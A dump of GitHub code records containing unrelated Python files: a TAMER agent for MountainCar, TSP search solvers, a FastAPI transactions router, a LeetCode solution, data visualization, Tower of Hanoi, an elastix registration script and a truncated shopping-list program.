m.getindex(tuple(coordinates), readonly)\n    if type(m)==int: return basehash(tuple(coordinates)) % m\n    if m==None: return coordinates\n\nfrom math import floor, log\nfrom itertools import zip_longest\n\ndef tiles (ihtORsize, 
numtilings, floats, ints=[], readonly=False):\n    \"\"\"returns num-tilings tile indices corresponding to the floats and ints\"\"\"\n    qfloats = [floor(f*numtilings) for f in floats]\n    Tiles = []\n    for tiling in range(numtilings):\n        tilingX2 = tiling*2\n        coords = [tiling]\n        b = tiling\n        for q in qfloats:\n            coords.append( (q + b) // numtilings )\n            b += tilingX2\n        coords.extend(ints)\n        Tiles.append(hashcoords(coords, ihtORsize, readonly))\n    return Tiles\n\ndef tileswrap (ihtORsize, numtilings, floats, wrapwidths, ints=[], readonly=False):\n    \"\"\"returns num-tilings tile indices corresponding to the floats and ints, wrapping some floats\"\"\"\n    qfloats = [floor(f*numtilings) for f in floats]\n    Tiles = []\n    for tiling in range(numtilings):\n        tilingX2 = tiling*2\n        coords = [tiling]\n        b = tiling\n        for q, width in zip_longest(qfloats, wrapwidths):\n            c = (q + b%numtilings) // numtilings\n            coords.append(c%width if width else c)\n            b += tilingX2\n        coords.extend(ints)\n        Tiles.append(hashcoords(coords, ihtORsize, readonly))\n    return Tiles\n\n\nclass MountainCarTileCoder:\n    def __init__(self, iht_size=4096, num_tilings=8, num_tiles=8):\n        \"\"\"\n        Initializes the MountainCar Tile Coder\n        \n        iht_size -- int, the size of the index hash table, typically a power of 2\n        num_tilings -- int, the number of tilings\n        num_tiles -- int, the number of tiles. Here both the width and height of the\n        tile coder are the same\n        \"\"\"\n        self.iht = IHT(iht_size)\n        self.num_tilings = num_tilings\n        self.num_tiles = num_tiles\n    \n    def get_tiles(self, position, velocity):\n        \"\"\"\n        Takes in a position and velocity from the mountaincar environment\n        and returns a numpy array of active tiles.\n        \n        returns:\n        tiles - np.array, active tiles\n        \"\"\"\n        # Use the ranges above and self.num_tiles to scale position and velocity to the range [0, 1]\n        # then multiply that range with self.num_tiles so it scales from [0, num_tiles]\n        minP=-1.2\n        maxP=.5\n        minV=-.07\n        maxV=.07\n        scaleP= maxP- minP\n        scaleV= maxV-minV\n        \n        position_scaled = ((position-minP)/(scaleP))*self.num_tiles\n        \n        velocity_scaled = ((velocity-minV)/(scaleV))*self.num_tiles\n        \n        \n        # get the tiles using tc.tiles, with self.iht, self.num_tilings and [scaled position, scaled velocity]\n        # nothing to implement here\n        mytiles = tiles(self.iht, self.num_tilings, [position_scaled, velocity_scaled])\n        \n        return np.array(mytiles)\n\n\n#this is the tamer agent class\n\nclass TamerAgent:\n    \"\"\"\n    Initialization of Tamer Agent. All values are set to None so they can\n    be initialized in the agent_init method.\n    \"\"\"\n    def __init__(self):\n        \n        \n        self.last_action = None\n        self.previous_tiles = None\n        self.first_state= None\n        self.current_action = None\n        self.current_tiles= None\n        \n        self.num_tilings = 8\n        self.num_tiles = 8\n        self.iht_size = 4096\n        self.epsilon = 0.01\n        self.x = .08\n        self.alpha =self.x/self.num_tilings #this is step size\n        self.num_actions = 3\n        self.actions = list(range(self.num_actions))\n        self.time_step=0\n        self.experiences= list()\n        self.max_n_experiences=1000\n        self.window_size=1\n        \n        \n        # We initialize self.w to three times the iht_size. 
Recall this is because\n        # we need to have one set of weights for each action.\n        self.w = np.ones((self.num_actions, self.iht_size))\n        \n        # We initialize self.mctc to the mountaincar version of the\n        # tile coder that we created\n        \n        self.mctc = MountainCarTileCoder(iht_size=self.iht_size,\n                                         num_tilings=self.num_tilings,\n                                         num_tiles=self.num_tiles)\n        \n    def argmax(self, q_values):\n        \"\"\"argmax with random tie-breaking\n        Args:\n            q_values (Numpy array): the array of action values\n        Returns:\n            action (int): an action with the highest value\n        \"\"\"\n        top = float(\"-inf\")\n        ties = []\n        \n        for i in range(len(q_values)):\n            if q_values[i] > top:\n                top = q_values[i]\n                ties = []\n        \n            if q_values[i] == top:\n                ties.append(i)\n        \n        return np.random.choice(ties)\n\n    def select_greedy_action(self, tiles):\n        \"\"\"\n        Selects an action using epsilon-greedy\n        Args:\n        tiles - np.array, an array of active tiles\n        Returns:\n        (chosen_action, action_value) - (int, float), tuple of the chosen action\n        and its value\n        \"\"\"\n        action_values = []\n        chosen_action = None\n        \n        for a in range(self.num_actions):\n            action_values.append(np.sum(self.w[a][tiles]))\n        # First loop through the weights of each action and populate action_values\n        # with the action value for each action and tiles instance\n        \n        if np.random.random() < self.epsilon:\n            chosen_action = np.random.choice(self.actions)\n        else:\n            chosen_action = self.argmax(action_values)\n        \n        return chosen_action\n    \n    def action_selection(self, state):\n        position, velocity = state\n        active_tiles=self.mctc.get_tiles(position, velocity)\n        current_action=self.select_greedy_action(active_tiles)\n        self.current_action = current_action\n        self.current_tiles = np.copy(active_tiles)\n        \n        \n    def agent_start(self, state):\n        \"\"\"The first method called when the experiment starts, called after\n        the environment starts.\n        Args:\n            state (Numpy array): the state observation from the\n                environment's env_start function.\n        Returns:\n            The first action the agent takes.\n        \"\"\"\n        position, velocity = state\n        \n        active_tiles=self.mctc.get_tiles(position, velocity)\n        \n        self.current_action = np.random.choice(self.actions)\n        self.current_tiles= np.copy(active_tiles)\n        \n        self.experiences.append((self.current_action, self.current_tiles, time.time()))\n        return self.current_action\n\n    \n    def update_reward_function(self, reward):\n        \n        if reward == 'good':\n            r = 1\n        elif reward == 'reallygood':\n            r = 4\n        elif reward == 'bad':\n            r = -1\n\n        elif reward == 'None':\n            return\n\n        else:\n            # unknown feedback label: ignore it rather than continue with an undefined r\n            return\n\n\n        current_time = time.time()\n        while len(self.experiences) > 0:\n            experience = self.experiences[0]\n            \n            #diff= current_time-experience[2]\n\n            #if (diff < .2 or diff > 2):\n            \n            if experience[2] < current_time - self.window_size: #\n                self.experiences.pop(0)\n            \n            else:\n                break\n\n# update weights using Algorithm 1 in paper\n        n_experiences = len(self.experiences)\n\n        if n_experiences== 0:\n            return\n        weight_per_experience = 1.0/n_experiences\n        cred_features = np.zeros((self.num_actions, self.iht_size))\n        \n        for experience in self.experiences:\n            exp_features= np.zeros((self.num_actions, self.iht_size))\n            exp_features[experience[0]][experience[1]]=1\n            \n            exp_features*=weight_per_experience\n            cred_features = np.add(cred_features, exp_features)\n        \n        error = r - self.w * cred_features\n        self.w += (.01*error*cred_features)\n\n\n# Original HIPPO Gym Agent\n\n'''\nThis is a demo file to be replaced by the researcher as required.\nThis file is imported by trial.py and trial.py will call:\nstart()\nstep()\nrender()\nreset()\nclose()\nThese 
functions are mandatory. This file contains minimum working versions\nof these functions, adapt as required for individual research goals.\n'''\n\nclass Agent():\n    '''\n    Use this class as a convenient place to store agent state.\n    '''\n\n    def start(self, game:str):\n        '''\n        Starts an OpenAI gym environment.\n        Caller:\n            - Trial.start()\n        Inputs:\n            - game (Type: str corresponding to allowable gym environments)\n        Returns:\n            - env (Type: OpenAI gym Environment as returned by gym.make())\n            Mandatory\n        '''\n        self.tamer = True\n        if self.tamer:\n            np.random.seed(0)\n            self.tamerAgent = TamerAgent()\n        self.env = gym.make(game)\n        return\n\n    def step(self, action, reward):\n        '''\n        Takes a game step.\n        Caller:\n            - Trial.take_step()\n        Inputs:\n            - env (Type: OpenAI gym Environment)\n            - action (Type: int corresponding to action in env.action_space)\n        Returns:\n            - envState (Type: dict containing all information to be recorded for future use)\n              change contents of dict as desired, but return must be type dict.\n        '''\n        if self.tamer:\n            if self.tamerAgent.time_step == 0:\n                self.tamerAgent.agent_start(self.tamerAgent.first_state)\n                time.sleep(1.5)\n\n            self.tamerAgent.time_step += 1\n            self.tamerAgent.update_reward_function(reward)\n            self.tamerAgent.last_action = self.tamerAgent.current_action\n            self.tamerAgent.previous_tiles = self.tamerAgent.current_tiles\n\n            if reward != 'None':\n                updated = True\n            else:\n                updated = False\n\n            observation, reward, done, info = self.env.step(self.tamerAgent.current_action)\n            action = self.tamerAgent.current_action\n        else:\n            observation, reward, done, info = self.env.step(action)\n\n        envState = {'observation': observation, 'reward': reward, 'done': done, 'info': info, 'agentAction': action}\n\n        if self.tamer:\n            self.tamerAgent.action_selection(observation)\n            self.tamerAgent.experiences.append((self.tamerAgent.current_action, self.tamerAgent.current_tiles, time.time()))\n        return envState\n\n    def render(self):\n        '''\n        Gets render from gym.\n        Caller:\n            - Trial.get_render()\n        Inputs:\n            - env (Type: OpenAI gym Environment)\n        Returns:\n            - return from env.render('rgb_array') (Type: npArray)\n              must return the unchanged rgb_array\n        '''\n        return self.env.render('rgb_array')\n\n    def reset(self):\n        '''\n        Resets the environment to start new episode.\n        Caller:\n            - Trial.reset()\n        Inputs:\n            - env (Type: OpenAI gym Environment)\n        Returns:\n            No Return\n        '''\n        if self.tamer:\n            self.tamerAgent.time_step=0\n            self.tamerAgent.first_state = self.env.reset()\n        else:\n            self.env.reset()\n\n    def close(self):\n        '''\n        Closes the environment at the end of the trial.\n        Caller:\n            - Trial.close()\n        Inputs:\n            - env (Type: OpenAI gym Environment)\n        Returns:\n            No Return\n        '''\n        self.env.close()\n\n","repo_name":"IRLL/HIPPO_Gym","sub_path":"App/tamerAgent.py","file_name":"tamerAgent.py","file_ext":"py","file_size_in_byte":13295,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"20355078705","text":"#!/usr/bin/env python\n\n# heuristic_search/astar.py\n# CS440: Project 1 - Heuristic Search\n# Authors: Matthew Chan and Jeremy Savarin\n\nimport random\n#import queue # contains priority queue for astar\nimport sys\nimport time\nimport math\nfrom my_pq import My_PQ\n\n\ndef invert(current, num_cities):\n    l = []\n    for i in range(num_cities):\n        if i not in current:\n            l.append(i)\n\n    return l\n\n\n\ndef astar_tsp(city_list, adj, tb=False):\n    # setup\n    inf = float('inf')\n    num_cities = len(city_list)\n    counter = 0\n\n\n    visited = set()\n    fringe = My_PQ()\n\n    # (f-val, 
((visited),g)\n fringe.put( (0, (tuple([0]), 0)) )\n\n start_t = time.clock()\n\n while not fringe.empty():\n # get from fringe and expand\n node = fringe.get()\n current = node[1][0]\n g_val = node[1][1]\n #print(current)\n\n if time.clock() - start_t > 600: # 10 min\n return (len(visited), 0)\n\n # not consistent, so may go over\n if len(current) > num_cities+1:\n continue\n if current in visited:\n continue\n visited.add(current)\n\n # check for the goal (g)\n if len(current) == num_cities+1:\n if(current[-1] == 0):\n for i in range(len(current)):\n if i not in current:\n continue\n if tb: return (len(visited), 1)\n return current\n\n\n # get neighbors, add to fringe (calc f value)\n for i in range(num_cities):\n if len(current) == num_cities:\n if i > 0:\n continue\n elif i in current:\n continue\n\n neighbor = current + tuple([i])\n unvisited = invert(current, num_cities) #faster?\n\n h_val = prim(unvisited, adj) + find_closest(0, unvisited, adj)\n #h_val = find_closest(i, unvisited, adj)\n new_g = g_val + adj[current[-1]][i]\n f_val = new_g + h_val\n\n fringe.put((f_val, (neighbor, new_g)))\n\n return (len(visited), 0) #No path\n\ndef generate_tsp(cities, rand_state=None):\n\n if rand_state != None:\n random.seed(rand_state)\n\n l = [] # list\n c_list = set()\n rand = random.randrange # localizing function\n for i in range(cities):\n while True:\n x = rand(100)\n y = rand(100)\n if (x,y) not in c_list:\n break\n l.append((i, (x, y)))\n c_list.add((x,y))\n\n return l\n\ndef init_adj(cities): # create adjacency matrix\n num = len(cities)\n inf = float('inf')\n res = [[0 for i in range(num)] for j in range(num)]\n \n for i in range(num):\n for j in range(num):\n res[i][j] = calc_dist(cities[i][1], cities[j][1])\n res[j][i] = res[i][j]\n\n for i in range(num):\n res[i][i] = inf\n\n return res\n\ndef calc_dist(a, b):\n return ((a[0]-b[0])**2 + (a[1]-b[1])**2)**.5\n\ndef closest(a, adj):\n return min(adj[a][:])\n\ndef find_closest(a, others, adj):\n min_dist = 1000\n closest = -1\n for i in others:\n if adj[a][i] < min_dist:\n min_dist = adj[a][i]\n closest = i\n return closest\n\ndef prim(cities, adj, retmst=False): #cities is list of ints\n\n if len(cities) == 0:\n return 0\n\n mst_set = set()\n mst = []\n mst_dist = 0\n\n city = cities.pop()\n mst_set.add(city)\n while len(cities) > 0:\n\n min_edge = float('inf')\n addition = None\n for i in mst_set:\n for j in cities:\n if adj[i][j] < min_edge:\n min_edge = adj[i][j]\n addition = (i,j)\n\n\n mst_dist += min_edge\n mst.append(addition)\n mst_set.add(addition[1])\n cities.remove(addition[1])\n\n #print(mst)\n if retmst:\n return (mst, mst_dist)\n return mst_dist\n\ndef print_tsp_grid(cities):\n\n l = []\n for city in cities:\n l.append(city[1])\n\n\n dim = 100\n\n print('\\t+' + '-'*dim + '+')\n\n y = 0\n while y < dim:\n print(str(y) + '\\t|', end='')\n\n x = 0\n while x < dim:\n if (x,y) in l:\n city = str(l.index((x,y)))\n print(city, end='')\n x+=len(city)\n else:\n print('.', end='')\n x += 1\n\n print('|')\n y += 1\n\n print('\\t+' + '-'*dim + '+')\n\ndef testbench(number):\n\n for i in range(25):\n cities = generate_tsp(number, rand_state=i)\n adj = init_adj(cities)\n start_t = time.clock()\n expanded, success = astar_tsp(cities, adj, tb=True)\n stop_t = time.clock()\n print(\"%d\\t%d\\t%d\\t%f\" % (number, success, expanded, stop_t-start_t))\n\ndef local_tsp_init(cities):\n num_cities = len(cities)\n tour = []\n l = [i for i in range(num_cities)]\n random.shuffle(l)\n for i in range(num_cities-1):\n tour.append((l[i], l[i+1]))\n 
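    # Aside (illustrative, not from the original repo): this function stores a tour
    # as a list of directed edges rather than a vertex sequence. For example, for the
    # shuffled order l = [2, 0, 1] the loop above yields [(2, 0), (0, 1)], and the
    # append below closes the cycle with (1, 2). The tour length is then
    # sum(adj[a][b] for (a, b) in tour), which is exactly what eval_tour() computes,
    # and swap_edges() can 2-opt the tour by replacing any two edges (a, b), (c, d)
    # with (a, c), (b, d).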
tour.append((l[-1], l[0]))\n\n return tour\n #num_cities = len(cities)\n #tour = [i for i in range(num_cities)]\n #random.shuffle(tour)\n\ndef local_tsp(tour, adj, tb=False, t=600, early=False):\n annealing = .50\n decrease = .01\n dec_iter = 50\n dist = 0\n new_dist = 0\n min_dist = float('inf')\n iters = 0\n num_c = 4 * len(tour) ** 2\n\n start_t = time.clock()\n\n counter = 0\n while (time.clock() - start_t) < t:\n\n success, new_dist = eval_swap(tour, adj, annealing)\n\n if counter % dec_iter == (dec_iter-1):\n annealing -= decrease\n if annealing < 0:\n annealing = 0\n\n if new_dist < dist:\n min_dist = new_dist\n iters = counter\n\n if early and annealing==0:\n if (counter-iters>num_c) and (dist > min_dist or math.isclose(dist, min_dist)):\n return tour, dist, (iters, min_dist, counter)\n\n dist = new_dist\n #print(dist)\n\n\n counter += 1\n\n #print(iters, min_dist)\n return tour, dist, (iters, min_dist, counter)\n\n\n\ndef swap_edges(tour, show_only=False):\n num_cities = len(tour)\n a=0\n b=0\n while True:\n a = random.randrange(num_cities)\n b = random.randrange(num_cities)\n if 2 < abs(a - b) < (num_cities-1):\n break;\n\n if show_only:\n return (a, b)\n\n e1 = tour[a]\n e2 = tour[b]\n n1 = (e1[0], e2[0])\n n2 = (e1[1], e2[1])\n\n tour.remove(e1)\n tour.remove(e2)\n tour.append(n1)\n tour.append(n2)\n\ndef eval_tour(tour, adj):\n dist = 0\n for e in tour:\n dist += adj[e[0]][e[1]]\n\n return dist\n\ndef eval_swap(tour, adj, anneal):\n dist = eval_tour(tour, adj)\n a, b = swap_edges(tour, show_only=True)\n e1 = tour[a]\n e2 = tour[b]\n n1 = (e1[0], e2[0])\n n2 = (e1[1], e2[1])\n new_dist = dist - adj[e1[0]][e1[1]] - adj[e2[0]][e2[1]] \\\n + adj[n1[0]][n1[1]] + adj[n2[0]][n2[1]]\n \n if new_dist < ((1+anneal)*dist):\n tour.remove(e1)\n tour.remove(e2)\n tour.append(n1)\n tour.append(n2)\n return (True, new_dist)\n \n return (False, dist)\n\ndef eval_set_tour(tour, adj):\n dist = 0\n for i in range(len(tour)-2):\n dist += adj[i][i+1]\n\n return dist\n\ndef local_testbench(number, t=60, e=False):\n for i in range(25):\n cities = generate_tsp(number, rand_state=i)\n adj = init_adj(cities)\n for j in range(3):\n tour = local_tsp_init(cities)\n start_t = time.clock()\n tour, dist, xtra = local_tsp(tour, adj, t=t, early=e)\n stop_t = time.clock()\n print(\"%d\\t%d\\t%d\\t%f\\t%f\\t%d\\t%f\" % (i, j, number, dist, xtra[1], xtra[2], stop_t-start_t))\n\ndef local_testbench_var(number, t=60, e=False): #variation\n cities = generate_tsp(number, rand_state=9001)\n for i in range(25):\n adj = init_adj(cities)\n tour = local_tsp_init(cities)\n start_t = time.clock()\n tour, dist, xtra = local_tsp(tour, adj, t=t, early=e)\n stop_t = time.clock()\n print(\"%d\\t%f\\t%f\\t%d\\t%f\" % (number, dist, xtra[1], xtra[2], stop_t-start_t))\n\n\n\nif __name__ == \"__main__\":\n\n #testbench(10)\n #local_testbench_var(25, t=10, e=True)\n local_testbench(int(sys.argv[1]), t=10, e=True)\n\n #cities = generate_tsp(10, rand_state=0)\n #print(cities)\n #adj = init_adj(cities)\n #start_t = time.clock()\n #result = astar_tsp(cities, adj, tb=False)\n #print(\"astar:\", result, eval_set_tour(result, adj))\n\n #cities = generate_tsp(50, rand_state=1)\n #print(cities)\n #adj = init_adj(cities)\n #tour = local_tsp_init(cities)\n ##print(tour, eval_tour(tour, adj))\n ##swap_edges(tour)\n ##print(tour, eval_tour(tour, adj))\n #t, dist, xtra = local_tsp(tour, adj)\n #print(\"local:\", tour, dist, xtra)\n\n #stop_t = 
time.clock()\n\n\n","repo_name":"mchan133/genetic-algorithm","sub_path":"heuristic-search-modified/heuristic_search/local_astar.py","file_name":"local_astar.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19335582089","text":"from fastapi import APIRouter, status, HTTPException\nfrom transaction import Transaction\nimport DBqueries as db\n\n\ntransactions_route = APIRouter()\n\n@transactions_route.get('/transactions', status_code=status.HTTP_200_OK)\ndef get_transactions(category = None):\n    \n    if(category):\n        return db.get_transactions_by_category(category)\n    else:\n        try:\n            return db.get_all_transactions()\n        except Exception:\n            raise HTTPException(status_code = status.HTTP_400_BAD_REQUEST, detail=\"Bad request: transactions were not fetched\")\n\n    \n\n@transactions_route.post('/transactions', status_code=status.HTTP_201_CREATED)\ndef add_transaction(transaction: Transaction):\n\n    if transaction.amount > 5000:\n        raise HTTPException(status_code=status.HTTP_406_NOT_ACCEPTABLE, detail=\"Transactions larger than 5000$ are not allowed\")\n    else:\n        db.insert_transaction(transaction)  \n\n\n@transactions_route.delete('/transactions/{id}', status_code=status.HTTP_200_OK)\nasync def remove_transaction(id: int):\n    exist = db.check_transaction_existence(id)\n    if exist:\n        db.delete_transaction(id)\n        return {\"result\": f\"transaction {id} deleted\"}\n    else:\n        raise HTTPException(status_code = status.HTTP_404_NOT_FOUND, detail='transaction does not exist in the database') \n","repo_name":"eladshachar/bank","sub_path":"backend/routes/transactions_router.py","file_name":"transactions_router.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22556421381","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @author: SaltFish\n# @file: 34二叉树中和为某一值的路径.py\n# @date: 2020/07/18\n\"\"\"\nGiven a binary tree and an integer, print all paths in the tree whose node values sum to the given integer. A path runs from the root node all the way down to a leaf node.\n\nExample:\nGiven the binary tree below and the target sum = 22,\n\n              5\n             / \\\n            4   8\n           /   / \\\n          11  13  4\n         /  \\    / \\\n        7    2  5   1\nreturn:\n[\n   [5,4,11,2],\n   [5,8,4,5]\n]\n\nDepth-first search with pruning\n\"\"\"\nfrom typing import List\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\n\nclass Solution:\n    def pathSum(self, root: TreeNode, sum: int) -> List[List[int]]:\n        res, path = [], []\n\n        def dfs(node: TreeNode, tar: int):\n            if not node:\n                return\n            path.append(node.val)\n            tar -= node.val\n            if tar == 0 and not node.left and not node.right:\n                res.append(list(path))\n            dfs(node.left, tar)\n            dfs(node.right, tar)\n            path.pop()\n\n        dfs(root, sum)\n        return res\n","repo_name":"SaItFish/PySundries","sub_path":"algorithm_questions/LeetCode/剑指Offer/34二叉树中和为某一值的路径.py","file_name":"34二叉树中和为某一值的路径.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6031670682","text":"\"\"\"The 'visualize' module includes functions to create visualizations of the dataset.\"\"\"\n\nfrom pandas.plotting import scatter_matrix\nfrom matplotlib import pyplot\nfrom src.models.train_model import get_dataset\n\n\ndef data_visualization_univariate(retrieved_dataset, shape: bool = True, head: bool = True, describe: bool = True,\n                                  group_by='', box_plot: bool = True, histograms: bool = True) -> None:\n    \"\"\"\n    Create a visualization of different 
univariate characteristics of the dataset.\n\n    :param retrieved_dataset: The parameter holding the dataset\n    :param bool shape: Boolean parameter used to trigger the visualization of the dataset's shape on or off\n    :param bool head: Boolean parameter used to trigger the visualization of the dataset's head on or off\n    :param bool describe: Boolean parameter used to trigger the visualization of the dataset's description, containing\n    the count, mean, std, min and max of the dataset, on or off\n    :param str group_by: When not an empty string, groups the dataset by the category corresponding to the contents of\n    the string\n    :param bool box_plot: Boolean parameter used to trigger the visualization of the dataset's box plot\n    :param bool histograms: Boolean parameter used to trigger the visualization of the dataset's histogram\n    :return:\n    \"\"\"\n    # shape\n    if shape:\n        print('\\n', retrieved_dataset.shape)\n\n    # head\n    if head:\n        print('\\n', retrieved_dataset.head(20))\n\n    # descriptions\n    if describe:\n        print('\\n', retrieved_dataset.describe())\n\n    # class distribution\n    if group_by != '':\n        print('\\n', retrieved_dataset.groupby(group_by).size())\n\n    # box and whisker plots\n    if box_plot:\n        retrieved_dataset.plot(kind='box', subplots=True, layout=(2, 2), sharex=False, sharey=False)\n\n    # histograms\n    if histograms:\n        retrieved_dataset.hist()\n\n\ndef data_visualization_multivariate(retrieved_dataset) -> None:\n    \"\"\"\n    Create a visualization of the multivariate characteristic of the dataset known as scatter plot matrix.\n\n    :param retrieved_dataset: The parameter holding the dataset\n    :return:\n    \"\"\"\n    # scatter plot matrix\n    scatter_matrix(retrieved_dataset)\n    pyplot.show()\n\n\nif __name__ == '__main__':\n    retrieved_dataset = get_dataset('external')\n    data_visualization_univariate(retrieved_dataset=retrieved_dataset, group_by='Genre')\n    data_visualization_multivariate(retrieved_dataset)\n","repo_name":"MunteanIoanHoriaMihai/Predicting-Customer-Behaviour","sub_path":"src/visualization/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8111780477","text":"#Hanoi Tower\n#no means the disk number only when printing;\n# in recursive calls it acts as the number of disks to move.\n\nimport sys\ndef move(no, x, y):\n    global cnt\n    cnt += 1\n    \n    \n    if no > 1 and no <= 20: \n        move(no-1, x, 6-x-y)\n        #recur: see the top-down analysis of the recursion. \n    moves.append([x, y])\n    cnts.append(cnt)\n    \n    \n    #Why does the output step sit in the middle? It follows the meaning of the move function itself; \n    #to output the disk number as-is.\n\n    if no > 1 and no <= 20:\n        move(no-1, 6-x-y, y)\n\n\nn = int(sys.stdin.readline())\ncnt = 0\ncnts = []\nmoves = []\nif n <= 20:\n    move(n, 1, 3)\n    print(cnts[-1])\n    for x, y in moves:\n        print(x, y)\n    \nelif n > 20:\n    print(2**n-1)\n\n","repo_name":"Hunue-Park/Algorithm_study","sub_path":"BOJ/1st_week/1914.py","file_name":"1914.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36047185634","text":"\"\"\"\nregistration for image and associated segmentation mask using elastix.\n\"\"\"\nimport pathlib\nimport shutil\nimport subprocess\n\n\n# elastix files\nelastix_base = pathlib.Path(r'C:\\Users\\zhaoyang\\Desktop\\elastix-5.0.0-win64')\nelastix = elastix_base.joinpath(r'elastix.exe')\ntransformix = elastix_base.joinpath(r'transformix.exe')\n# see: http://elastix.bigr.nl/wiki/index.php/Default0\np_Rigid = elastix_base.joinpath(r'parameters\\Parameters_Rigid.txt')\np_BSpline = elastix_base.joinpath(r'parameters\\Parameters_BSpline.txt')\n\n\ndef create_dir(path: pathlib.Path, parents: bool=True):\n    \"\"\"\n    create directory if it does not exist.\n    :param path: pathlib.Path: create dir path object\n    :param parents: boolean: whether to create parent dirs, default is True.\n    :return:\n    \"\"\"\n    if not path.exists():\n        path.mkdir(parents=parents)\n\n\ndef get_pname(p: pathlib.Path):\n    \"\"\"\n    resolve patient name.\n\n    e.g.\n    /path/to/abc.mha -> abc\n    /path/to/abc_seg.mha -> abc\n    \"\"\"\n    if p.stem.endswith('_seg'):\n        return p.stem[:-len('_seg')]\n    return p.stem\n\n\ndef split_fixed_moving(src_ori_dir: pathlib.Path, src_seg_dir: pathlib.Path, fx_id: int=0):\n    # fx_id: fixed image ID\n\n    # collect all image paths\n    ori_path_list = list(src_ori_dir.iterdir())\n    ori_path_list = sorted(ori_path_list)\n\n    # collect all ground-truth paths\n    seg_path_list = [src_seg_dir.joinpath(ori_path.stem + '_seg' + ori_path.suffix) for ori_path in ori_path_list]\n\n    # fixed image file path\n    fixed_ori_path = ori_path_list.pop(fx_id)\n    fixed_seg_path = seg_path_list.pop(fx_id)\n    print(f'fixed: {fixed_ori_path.stem}')\n\n    # moving image files path list\n    moving_ori_paths = ori_path_list\n    moving_seg_paths = seg_path_list\n\n    return (fixed_ori_path, moving_ori_paths,\n            fixed_seg_path, moving_seg_paths)\n\n\ndef process_oris(fixed_path: pathlib.Path, moving_paths: list, reg_tmp_dir: pathlib.Path, copy_dst_dir: pathlib.Path):\n    \"\"\"Registration process for original images.\n\n    Arguments:\n        fixed_path {pathlib.Path} -- src fixed original image path\n        moving_paths {list} -- src moving original image path list\n        reg_tmp_dir {pathlib.Path} -- elastix tmp output dir path\n        copy_dst_dir {pathlib.Path} -- final dir path to copy registration results into\n    \"\"\"\n    for moving_path in moving_paths:\n        print(f'processing moving: {moving_path.stem}')\n\n        # result output path\n        output_dir = reg_tmp_dir.joinpath(moving_path.stem)\n        create_dir(output_dir)\n\n        # elastix command\n        command = f'{elastix} -f {fixed_path} -m {moving_path} -p {p_Rigid} -p {p_BSpline} -out {output_dir}'\n        print(f'elastix command: {command}')\n\n        p = subprocess.Popen(command)\n        p.wait()\n\n        # copy registered results\n        copy_to_dir = copy_dst_dir.joinpath(moving_path.parent.stem)\n        create_dir(copy_to_dir)\n        copy_to_file = copy_to_dir.joinpath(moving_path.name)\n\n        registered_file = output_dir.joinpath('result.1.mha')\n        shutil.copy(registered_file, copy_to_file)\n\n\ndef process_segs(moving_paths: list, reg_tmp_dir: 
pathlib.Path, copy_dst_dir: pathlib.Path):\n    \"\"\"Registration process for segmentation masks.\n    Transform label map using the deformation field from process_oris()\n\n    Arguments:\n        moving_paths {list} -- src moving atlas or associated segmentation path list\n        reg_tmp_dir {pathlib.Path} -- elastix tmp output dir path\n        copy_dst_dir {pathlib.Path} -- final dir path to copy registration results into\n    \"\"\"\n    for moving_path in moving_paths:\n        output_dir = reg_tmp_dir.joinpath(get_pname(moving_path))\n        tp = output_dir.joinpath('TransformParameters.1.txt')\n        tp_label = output_dir.joinpath('TransformParameters.1.ForLable.txt')\n\n        # modify TransformParameters.1.txt for label reg\n        with tp.open('r') as f_tp:\n            lines = f_tp.readlines()\n            lines[30] = '(FinalBSplineInterpolationOrder 0)\\n'\n            lines[34] = '(DefaultPixelValue 0)\\n'\n            lines[36] = '(ResultImagePixelType \"int\")\\n'\n        with tp_label.open('w') as f_tp_label:\n            f_tp_label.writelines(lines)\n\n        # elastix command\n        # use \"-def all\" to transform all points from the input-image, which effectively generates a deformation field.\n        command = f'{transformix} -def all -in {moving_path} -tp {tp_label} -out {output_dir}'\n        print(f'elastix command: {command}')\n\n        p = subprocess.Popen(command)\n        p.wait()\n\n        # copy registered results\n        copy_to_dir = copy_dst_dir.joinpath(moving_path.parent.stem)\n        create_dir(copy_to_dir)\n        copy_to_file = copy_to_dir.joinpath(moving_path.name)\n\n        registered_file = output_dir.joinpath('result.mha')\n        shutil.copy(registered_file, copy_to_file)\n\n\nif __name__ == '__main__':\n    # source path\n    src_path = pathlib.Path(r'C:\\Users\\zhaoyang\\Desktop\\data_2d')\n    src_ori_dir = src_path.joinpath('ori')\n    src_seg_dir = src_path.joinpath('seg')\n\n    # destination path\n    reg_tmp_path = pathlib.Path(r'C:\\Users\\zhaoyang\\Desktop\\data_reg_tmp')\n    copy_dst_path = pathlib.Path(r'C:\\Users\\zhaoyang\\Desktop\\data_reg_copy')\n\n    # get fixed and moving images\n    fixed_ori_path, moving_ori_paths, \\\n    fixed_seg_path, moving_seg_paths = split_fixed_moving(src_ori_dir, src_seg_dir)\n\n    # process\n    process_oris(fixed_ori_path, moving_ori_paths, reg_tmp_path, copy_dst_path)\n    process_segs(moving_seg_paths, reg_tmp_path, copy_dst_path)\n\n    # remove reg_tmp_path\n    # shutil.rmtree(reg_tmp_path)\n","repo_name":"kernel1994/tool-scripts","sub_path":"register_elastix.py","file_name":"register_elastix.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39908247551","text":"\"\"\"\nBuild a shopping list using lists\nthe user must be able to insert, delete and list the values of their list\ndo not let the program crash with\nerrors from nonexistent indices in the list\n\"\"\"\nimport os\n\nlista_de_compras = []\n\nwhile True:\n    opção = input(\"Select an 